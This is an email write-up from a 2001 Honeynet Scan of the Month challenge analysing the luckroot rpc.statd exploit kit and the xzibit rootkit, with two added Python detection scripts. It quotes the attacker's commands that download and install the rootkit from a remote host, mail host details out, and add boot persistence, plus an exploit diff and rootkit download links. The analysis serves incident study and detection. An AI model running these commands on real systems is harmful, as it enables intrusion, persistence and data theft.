From gfk@logidac.com Sat Mar 17 20:01:49 2001
Date: Mon, 5 Mar 2001 22:09:00 -0500
From: Guillaume Filion
To: project@honeynet.org
Subject: Scan of the month

Hi,

Here's my try at scan13. It was not very hard, but it was quite long; it took me two evenings to do! Nevertheless I'm happy to have done it, as it has improved my knowledge of how rootkits work, especially Linux Rootkit.

### 1. What is the blackhat attempting to do with his command line syntax?

The attacker downloads a scanning tool called luckroot and decompresses it. After that, the blackhat sends commands to do port 111 vulnerability scans and root gain for these subnets:

216.210.0.0/16
200.120.0.0/16
64.120.0.0/16
216.200.0.0/16
63.1.0.0/16
216.10.0.0/16
210.120.0.0/16
64.1.0.0/16
216.1.0.0/16
194.1.0.0/16
210.128.0.0/16
24.1.0.0/16
12.20.0.0/16

We see that the attacker strangely tries to scan the same subnet twice, maybe because the Honeypot is behind a reversed firewall and the scanning tool is reporting that it cannot connect to anything... I'm not sure about that, maybe he's just drunk... 8*)

We can also see that the attacker has fat fingers (okay, he must be drunk), since it takes him 4 tries to type "tar -zxvf LUCKROOT.TAR" correctly. BTW, the z flag is useless since the archive is not gzipped.

### 2. What does the tool accomplish?

The tool is an impressive all-in-one scan/access gain tool. First it scans a user-specified subnet for vulnerable RedHat 6.x sunrpc. If it finds one, it automatically does the exploit. If the exploit works, it downloads a rootkit and installs it on the exploited box.

### 3. How does the tool work?

The script luckgo compiles the files luckscan-a.c and luckstatdx.c if they are not already compiled.
After that it opens a process of the freshly compiled scanner luckscan-a to scan a user-specified subnet on port 111 (sunrpc). If luckscan-a finds a target with an open sunrpc port, it starts the exploit luckstatdx. luckstatdx tries to exploit sunrpc on Linux boxes running RedHat 6.0, RedHat 6.1 or RedHat 6.2. If the exploit is successful, luckstatdx sends the following command to the attacked box:

cd /; uname -a; id; wget -nd http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz

In short, this command downloads a rootkit called xzibit and installs it on the attacked box. You can download xzibit at the attacker's site (http://www.becys.org/xzibit.tar.gz) or you can fetch a copy on mine (http://logidac.com/gfk/xzibit.tar.gz).

Here's a description of what xzibit does:

xzibit installs trojaned versions of netstat, ps, ifconfig and top; I guess these are taken from lrk (linux rootkit).

It creates a file /dev/caca containing:
-----
1 193.231.139
1 213.154.137
1 193.254.34
3 6969
3 3666
3 31221
3 22546
4 6969
4 2222
-----

The string /dev/caca is present in the trojaned version of netstat. My guess is that it is a copy of lrk's netstat. Here's the part of lrk's README talking about netstat:
-----
netstat - Modified to remove tcp/udp/sockets from or to specified addresses, uids and ports. The file is ROOTKIT_ADDRESS_FILE.
default data file: /dev/ptyq
type 0: hide uid
type 1: hide local address
type 2: hide remote address
type 3: hide local port
type 4: hide remote port
type 5: hide UNIX socket path

example:
0 500            <- Hides all connections by uid 500
1 128.31         <- Hides all local connections from 128.31.X.X
2 128.31.39.20   <- Hides all remote connections to 128.31.39.20
3 8000           <- Hides all local connections from port 8000
4 6667           <- Hides all remote connections to port 6667
5 .term/socket   <- Hides all UNIX sockets including the path .term/socket
-----

Lines starting with '1' are /24 subnets: 193.231.128.0/19 belongs to the Romanian Education Network, 213.154.135-140.0-255 belongs to PCNET - ATM-ADSL Network (Bucharest, Romania) and 193.254.32.0/19 belongs to LOGIC TELECOM SA, Romania. My guess is that they're subnets that the attacker "0wnz". The trojaned netstat will hide connections from these subnets. It will also hide local connections from ports 6969, 3666, 31221, 22546 and to ports 6969, 2222.

The rootkit also creates a file /dev/dsx containing:
-----
3 sl2
3 sshdu
3 linsniffer
3 smurf
3 slice
3 mech
3 muh
3 bnc
3 psybnc
-----

The string /dev/dsx is present in the trojaned ps and top; I guess these are the processes that should be hidden. Here's the part of lrk's README talking about ps:
-----
ps - Modified to remove specified processes. The file used is ROOTKIT_PROCESS_FILE, default to /dev/ptyp. An example data file is as follows:
0 0        Strips all processes running under root
1 p0       Strips tty p0
2 sniffer  Strips all programs with the name sniffer
3 hack     Strips all programs with 'hack' in them ie. proghack1, hack.scan, snhack etc.
Don't put in the comments, obviously.
Note: if this doesn't seem to work make sure there are no spaces after the names, and don't use the full path name.
-----

So ps and top will hide every process containing sl2, sshdu, linsniffer, smurf, slice, mech, muh, bnc or psybnc.
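The two hide files quoted above (/dev/caca for netstat, /dev/dsx for ps and top) follow the lrk format described in the README excerpts. As an added example that is not part of the original write-up, nor code from lrk or xzibit, the following Python re-implements the rule types from the README and applies them to constructed sample connection and process records, so an analyst can see precisely what the trojaned netstat, ps and top on such a host would be blind to. The octet-boundary prefix match for type 1 and 2 rules and the sample records are my assumptions; the write-up does not show lrk's actual comparison code.

```python
"""Interpret lrk-style hide files (/dev/caca for netstat, /dev/dsx for ps/top)
and show which records a trojaned netstat/ps/top would suppress.

Added example; not code from the original write-up, lrk or xzibit.  Rule types
follow the lrk README quoted above; the sample records are constructed."""

from dataclasses import dataclass

# Hide-file contents exactly as listed in the write-up.
CACA = """1 193.231.139
1 213.154.137
1 193.254.34
3 6969
3 3666
3 31221
3 22546
4 6969
4 2222
"""

DSX = """3 sl2
3 sshdu
3 linsniffer
3 smurf
3 slice
3 mech
3 muh
3 bnc
3 psybnc
"""


def parse_hide_file(text):
    """Return (type, value) rules; blank or malformed lines are skipped."""
    rules = []
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].isdigit():
            rules.append((int(parts[0]), parts[1].strip()))
    return rules


def ip_has_prefix(addr, prefix):
    """'193.231.139' covers 193.231.139.X.  Assumption: compare whole octets,
    so '193.231.13' does not also match 193.231.139.X."""
    want = prefix.split(".")
    return addr.split(".")[:len(want)] == want


@dataclass
class Conn:
    uid: int
    local_addr: str
    local_port: int
    remote_addr: str
    remote_port: int
    unix_path: str = ""


def netstat_hides(conn, rules):
    """True if lrk netstat would drop this connection (README types 0-5)."""
    for kind, value in rules:
        if (kind == 0 and conn.uid == int(value)
                or kind == 1 and ip_has_prefix(conn.local_addr, value)
                or kind == 2 and ip_has_prefix(conn.remote_addr, value)
                or kind == 3 and conn.local_port == int(value)
                or kind == 4 and conn.remote_port == int(value)
                or kind == 5 and value in conn.unix_path):
            return True
    return False


@dataclass
class Proc:
    uid: int
    tty: str
    name: str


def ps_hides(proc, rules):
    """True if lrk ps/top would drop this process (README types 0-3)."""
    for kind, value in rules:
        if (kind == 0 and proc.uid == int(value)
                or kind == 1 and proc.tty == value
                or kind == 2 and proc.name == value
                or kind == 3 and value in proc.name):
            return True
    return False


def hidden_connections(conns, text=CACA):
    rules = parse_hide_file(text)
    return [c for c in conns if netstat_hides(c, rules)]


def hidden_processes(procs, text=DSX):
    rules = parse_hide_file(text)
    return [p for p in procs if ps_hides(p, rules)]


# Constructed sample records: what a clean netstat/ps would list.
SAMPLE_CONNS = [
    Conn(0, "10.0.0.5", 6969, "193.231.139.10", 40000),  # sshdu session
    Conn(0, "10.0.0.5", 22, "10.0.0.9", 51000),          # legitimate ssh
    Conn(500, "10.0.0.5", 35000, "198.51.100.7", 2222),  # outbound to 2222
    Conn(500, "10.0.0.5", 35001, "198.51.100.7", 80),    # ordinary http
]
SAMPLE_PROCS = [
    Proc(0, "?", "sshdu"), Proc(0, "?", "linsniffer"),
    Proc(0, "?", "sshd"), Proc(500, "pts/0", "bash"),
]

if __name__ == "__main__":
    for c in hidden_connections(SAMPLE_CONNS):
        print("trojaned netstat would hide:", c)
    for p in hidden_processes(SAMPLE_PROCS):
        print("trojaned ps/top would hide:", p)
```

Run against the sample records, the /dev/caca rules suppress the sshdu session on local port 6969 and the outbound connection to remote port 2222, while the /dev/dsx rules suppress sshdu and linsniffer but leave the genuine sshd visible, which is why a clean netstat and ps from trusted media are needed during triage.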
The rootkit then creates the folder /dev/ida/.inet and installs, among other things, an sshd daemon (sshdu) and a port sniffer (linsniffer) in the folder. The files installed are:

linsniffer       port sniffer
logclear         script to delete sniffer's log and restart linsniffer
sense            sorts the output from LinSniffer
sl2              DoS tool based on synk4 (my guess)
sshdu            sshd daemon (maybe with a backdoor)
s                sshd daemon configuration file
ssh_host_key     sshd daemon host key
ssh_random_seed  sshd daemon random seed

The sshdu daemon runs on port 6969; it accepts RSAAuthentication and PasswordAuthentication. I'm pretty sure that a backdoor is present in sshdu, but I couldn't find it...

linsniffer is a standard port sniffer (the source is available on packetstorm: http://packetstorm.securify.com/Exploit_Code_Archive/linsniffer.c); it's also part of lrk. linsniffer will sniff these tcp ports: 21 ftp, 23 telnet, 110 pop3, 109 pop2, 143 imap2, 513 rlogin, 106 poppasswd.

The rootkit also installs a shell script in /usr/bin/hdparm:
-----
#!/bin/sh
cd /dev/ida/.inet
./sshdu -f ./s
./linsniffer >> ./tcp.log &
cd /
-----

It modifies /etc/rc.d/rc.sysinit to run hdparm (that is, the sshd backdoor and the sniffer) on every boot:
-----
echo "/usr/bin/hdparm -t1 -X53 -p" >> /etc/rc.d/rc.sysinit
echo >> /etc/rc.d/rc.sysinit
-----

It also tries to install a CGI backdoor, becys.cgi.

Last thing, it sends some nice info to the owner:
-----
touch /tmp/info
/sbin/ifconfig | grep inet >> /tmp/info
hostname -f >> /tmp/info
uname -a >> /tmp/info
cat /tmp/info | mail -s "becys rewting" becys@becys.org
rm -f /tmp/info
-----

### 4. Is this tool a worm, or would you classify it as something else?

The jargon file defines a worm as:
-----
worm n. [from `tapeworm' in John Brunner's novel "The Shockwave Rider", via XEROX PARC] A program that propagates itself over a network, reproducing itself as it goes. Compare virus. Nowadays the term has negative connotations, as it is assumed that only crackers write worms.
Perhaps the best-known example was Robert T. Morris's Great Worm of 1988, a `benign' one that got out of control and hogged hundreds of Suns and VAXen across the U.S. See also cracker, RTM, Trojan horse, ice.
-----
(ref: http://www.tf.hut.fi/cgi-bin/jargon?search=worm)

I would not call this tool a worm, because it does not reproduce itself: the rootkit copied to the victim's computer is not luckroot but xzibit. This does not fit the recursive nature of a worm. To fit the definition of a worm, the luckstatdx exploit should download luckroot to the victim's computer and scan other targets.

### 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified?

luckstatdx.c is a slightly modified version of statdx.c:

*** statdx ***
Redhat Linux 6.0/6.1/6.2 rpc.statd remote root exploit (IA32)
*** by ron1n ***
*** August 3, 2000 ***
Sydney, Australia

statdx.c is available on packetstorm: http://packetstorm.securify.com/0008-exploits/statdx.c

Here's a (reduced) diff between the original statdx.c and luckstatdx.c:
-----
[gfk@cesam scan13]$ diff statdx.c luckstatdx.c
[...SNIP...]
261c162
< fprintf(stderr, "statdx by ron1n \n");
---
> fprintf(stderr, "statdx modify by becys \n");
286a188
> // Becys was modify herre some cmd.
288c190
< send(sockd, "cd /; ls -alF; id;\n", 19, 0);
---
> send(sockd, "cd /; uname -a; id; wget -nd
>http://www.becys.org/xzibit.tar.gz; tar -zxvf xzibit.tar.gz; cd
>lamerk; ./install; cd /; rm -rf lamerk xzibit.tar.gz\n", 19, 0);
289a192
> // Aici cred ca trebuie un exit.
349c252
< printf("OMG! You now have rpc.statd technique!@#$!\n");
---
> printf("You now have a new server rooted with rpc.statd
>technique and becys|ReSpEkT scan-h4x0r !\n");
597c500
< printf("A timeout was expected. Attempting connection to shell..\n");
---
> printf("Hmm,maibe i can root it. Attempting connection to
>shell..\n");
599c502
< printf("Failed\n");
---
> printf("Fucking shit,i cant,sorry.\n");
611d513
<
-----

As for luckscan-a.c, I found at http://www.self-evident.com/security/scanners/pscan-a.c.gz almost the exact same program, but called pscan-a.c. I also found at http://security.tsu.ru/info/unix/lance/README.cracker.txt the README for a package called cracker.pl, which says:
-----
Also shouts to Volatile, a person I dont know but I'm using his pscan in this package without his permission. (which I think is semi-private)
-----

The difference between luckscan-a.c and pscan-a.c is that luckscan-a.c starts luckstatdx if it finds a vulnerable target.

pscan-a.c:
-----
else {
    printf("%s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr), (time(0)-connlist[i].a));
    close(connlist[i].s);
    connlist[i].status = S_NONE;
}
-----

luckscan-a.c:
-----
else {
    char luck[100];
    sprintf(luck,"./luckstatdx -d 0 %s",(char *)inet_ntoa(connlist[i].addr.sin_addr),(time(0)-connlist[i].a));
    printf("Lets try to root the %s\n", (char *)inet_ntoa(connlist[i].addr.sin_addr), (time(0)-connlist[i].a));
    system(luck);
    printf("We continue to h4x0r ...\n");
    close(connlist[i].s);
    connlist[i].status = S_NONE;
}
-----

As for the xzibit rootkit, it uses ps, netstat, top and ifconfig of lrk.

### Bonus Question: What information can you obtain about who is using or created the tool?

luckroot announces itself with the following header:
-----
http://www.becys.org
.:[becys@becys.org]:.
-----

The xzibit rootkit is available at http://www.becys.org/xzibit.tar.gz and it sends data to becys@becys.org. So it looks like the domain becys.org has something to do with the attack. It looks like becys@yahoo.com also belongs to the attacker.

The server www.becys.org is hosted at WEBSITESOURCE.COM, which rents its rackspace at Alabanza.com (hey, the same as me! (logidac.com)).
A search on Google for becys gives some nice info about the attacker:

http://www.rdsnet.ro/rds-bin/publicitate_detaliu?anunttype_id=1 :
-----
19-Oct-2000
Vand chip tunning-uri originale din Germania/Austria pentru motoare Diesel. O crestere performanta a c.p. ai motorului. Pentru mai multe informatii nu ezita sa ma contactezi . PRETURI LA SFERTUL PIETEI .
becys@yahoo.com 093837243
-----

Ok, I don't speak Romanian, but it's a Romanian server and contains becys@yahoo.com. It looks like the attacker has a car for sale. 8*)

Best,
GFK's

--
Guillaume Filion
Logidac Tech., Beaumont, Québec, Canada - http://logidac.com/
PGP Key: http://guillaume.filion.org/pgp (this will redirect)
PGP Fingerprint: 14A6 720A F7BA 6C87 2331 33FD 467E 9198 3DED D5CA
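Question 3 of the write-up lists the on-disk artefacts xzibit leaves behind: regular files in /dev (/dev/caca, /dev/dsx), the /dev/ida/.inet directory, a shell script in place of /usr/bin/hdparm, and a line appended to /etc/rc.d/rc.sysinit. As an added example that is not part of the original write-up, the following Python checks an offline copy of a root filesystem (a mounted image or a tar extract) for those artefacts. It also builds a small constructed sample tree in a temporary directory so it runs without a real image. The ELF-magic test for hdparm, the "regular file under /dev" heuristic and the sample tree layout are my assumptions; the paths and strings themselves come from the write-up.

```python
"""Offline check for the xzibit persistence artefacts described in question 3,
run against a copied or mounted root filesystem.

Added example, not code from the original write-up or from xzibit.  Paths and
strings are taken from the write-up; build_sample_tree() creates a constructed
tree for demonstration only."""

import os
import stat
import tempfile

# Artefacts named in the write-up (paths relative to the filesystem root).
HIDDEN_DIR = "dev/ida/.inet"
HDPARM = "usr/bin/hdparm"
RC_SYSINIT = "etc/rc.d/rc.sysinit"
RC_MARKER = "/usr/bin/hdparm -t1 -X53 -p"
ELF_MAGIC = b"\x7fELF"


def regular_files_under_dev(root):
    """/dev should hold device nodes, directories and symlinks.  A regular
    file there is worth a look: lrk keeps its config in /dev/ptyq and /dev/ptyp,
    xzibit in /dev/caca and /dev/dsx."""
    found = []
    for dirpath, _dirs, files in os.walk(os.path.join(root, "dev")):
        for name in files:
            path = os.path.join(dirpath, name)
            if stat.S_ISREG(os.lstat(path).st_mode):
                found.append(os.path.relpath(path, root))
    return sorted(found)


def hdparm_is_script(root):
    """The genuine hdparm is an ELF binary; xzibit replaces it with a shell
    script, so a file without the ELF magic in the first 4 bytes is suspect."""
    path = os.path.join(root, HDPARM)
    if not os.path.isfile(path):
        return False
    with open(path, "rb") as f:
        return f.read(4) != ELF_MAGIC


def rc_sysinit_hits(root):
    """Lines of rc.sysinit that start the trojaned hdparm at boot."""
    path = os.path.join(root, RC_SYSINIT)
    if not os.path.isfile(path):
        return []
    with open(path, errors="replace") as f:
        return [line.rstrip("\n") for line in f if RC_MARKER in line]


def scan(root):
    """Collect all indicators for one filesystem root."""
    return {
        "dev_regular_files": regular_files_under_dev(root),
        "hidden_dir_present": os.path.isdir(os.path.join(root, HIDDEN_DIR)),
        "hdparm_is_script": hdparm_is_script(root),
        "rc_sysinit_hits": rc_sysinit_hits(root),
    }


def build_sample_tree(root, infected=True):
    """Constructed sample image.  infected=True mimics an xzibit install;
    infected=False gives a clean tree with an ELF-looking hdparm."""
    for d in ["dev", "usr/bin", "etc/rc.d"]:
        os.makedirs(os.path.join(root, d), exist_ok=True)
    with open(os.path.join(root, RC_SYSINIT), "w") as f:
        f.write("#!/bin/sh\n# ... normal init ...\n")
        if infected:
            f.write(RC_MARKER + "\n\n")
    if not infected:
        with open(os.path.join(root, HDPARM), "wb") as f:
            f.write(ELF_MAGIC + b"\x00" * 12)   # stand-in for a real binary
        return
    os.makedirs(os.path.join(root, HIDDEN_DIR), exist_ok=True)
    with open(os.path.join(root, "dev/caca"), "w") as f:
        f.write("1 193.231.139\n3 6969\n4 2222\n")
    with open(os.path.join(root, "dev/dsx"), "w") as f:
        f.write("3 sshdu\n3 linsniffer\n")
    with open(os.path.join(root, HDPARM), "w") as f:
        f.write("#!/bin/sh\ncd /dev/ida/.inet\n./sshdu -f ./s\n"
                "./linsniffer >> ./tcp.log &\ncd /\n")


def demo(infected=True):
    """Build a sample tree in a temp dir, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root, infected)
        return scan(root)


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

On a live system these checks are only meaningful when run from trusted media, since the trojaned ps, netstat and top (and a possibly trojaned shell or coreutils) cannot be relied on; against a copied image they are safe to run as-is.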